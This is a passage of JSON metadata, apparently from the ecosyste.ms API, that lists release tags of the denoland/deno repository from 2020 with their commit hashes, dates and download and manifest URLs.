itHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manife